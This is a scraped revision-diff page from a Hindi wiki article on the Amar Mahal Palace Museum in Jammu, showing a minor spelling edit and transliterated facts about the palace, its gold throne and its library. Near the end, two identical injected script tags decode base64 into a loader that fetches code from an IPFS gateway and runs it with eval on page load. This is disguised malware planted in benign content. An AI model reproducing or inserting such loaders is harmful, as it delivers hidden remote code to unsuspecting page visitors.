Difference between revisions of "अमर महल पैलेस संग्रहालय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खूबसूरत" to "ख़ूबसूरत")
Line 2: Line 2:
 
*अमर महल राजा [[अमर सिंह]] का आवासीय महल था। लेकिन बाद में इस महल को संग्रहालय में तब्‍दील कर दिया गया।  
 
*अमर महल राजा [[अमर सिंह]] का आवासीय महल था। लेकिन बाद में इस महल को संग्रहालय में तब्‍दील कर दिया गया।  
 
*अमर महल को संग्रहालय का रूप दे दिया गया है यहाँ पर शाही परिवार की अनेक वस्तुएँ देखने योग्य हैं।
 
*अमर महल को संग्रहालय का रूप दे दिया गया है यहाँ पर शाही परिवार की अनेक वस्तुएँ देखने योग्य हैं।
*[[लाल रंग|लाल]] पत्थरों से बना यह खूबसूरत महल जम्मू के प्रमुख पर्यटन स्थलों में से एक है।  
+
*[[लाल रंग|लाल]] पत्थरों से बना यह ख़ूबसूरत महल जम्मू के प्रमुख पर्यटन स्थलों में से एक है।  
 
*अमर महल के एक ओर जहाँ शिवालिक पहाडियाँ है वहीं दूसरी ओर [[तावी नदी]] बहती है।  
 
*अमर महल के एक ओर जहाँ शिवालिक पहाडियाँ है वहीं दूसरी ओर [[तावी नदी]] बहती है।  
 
*इस संग्रहालय की देख-रेख हरी-तरन चैरिटेबल ट्रस्ट द्वारा किया जाता है।  
 
*इस संग्रहालय की देख-रेख हरी-तरन चैरिटेबल ट्रस्ट द्वारा किया जाता है।  
 
*अमर महल में शुद्ध सोने का बना राजसिंहासन है। यह राजसिंहासन 120 किलो सोने से बना हुआ है।  
 
*अमर महल में शुद्ध सोने का बना राजसिंहासन है। यह राजसिंहासन 120 किलो सोने से बना हुआ है।  
*इस संग्रहालय में कई खूबसूरत चित्रकारी (पेंटिंग) है जिन्हें नल दमयंती के नाम से जाना जाता है।  
+
*इस संग्रहालय में कई ख़ूबसूरत चित्रकारी (पेंटिंग) है जिन्हें नल दमयंती के नाम से जाना जाता है।  
 
*इसके अलावा यहाँ एक पुस्तकालय भी है जिसमें विभिन्न विषयों की 25,000 किताबें मौजूद है।
 
*इसके अलावा यहाँ एक पुस्तकालय भी है जिसमें विभिन्न विषयों की 25,000 किताबें मौजूद है।
  

Revision as of 11:18, 30 November 2010

  • 'amar mahal pailes myooziyam' jammoo aur kashmir rajy ke jammoo shahar mean sthit hai.
  • amar mahal raja amar sianh ka avasiy mahal tha. lekin bad mean is mahal ko sangrahalay mean tabh‍dil kar diya gaya.
  • amar mahal ko sangrahalay ka roop de diya gaya hai yahaan par shahi parivar ki anek vastuean dekhane yogy haian.
  • lal pattharoan se bana yah khoobasoorat mahal jammoo ke pramukh paryatan sthaloan mean se ek hai.
  • amar mahal ke ek or jahaan shivalik pahadiyaan hai vahian doosari or tavi nadi bahati hai.
  • is sangrahalay ki dekh-rekh hari-taran chairitebal trast dvara kiya jata hai.
  • amar mahal mean shuddh sone ka bana rajasianhasan hai. yah rajasianhasan 120 kilo sone se bana hua hai.
  • is sangrahalay mean kee khoobasoorat chitrakari (peantiang) hai jinhean nal damayanti ke nam se jana jata hai.
  • isake alava yahaan ek pustakalay bhi hai jisamean vibhinn vishayoan ki 25,000 kitabean maujood hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh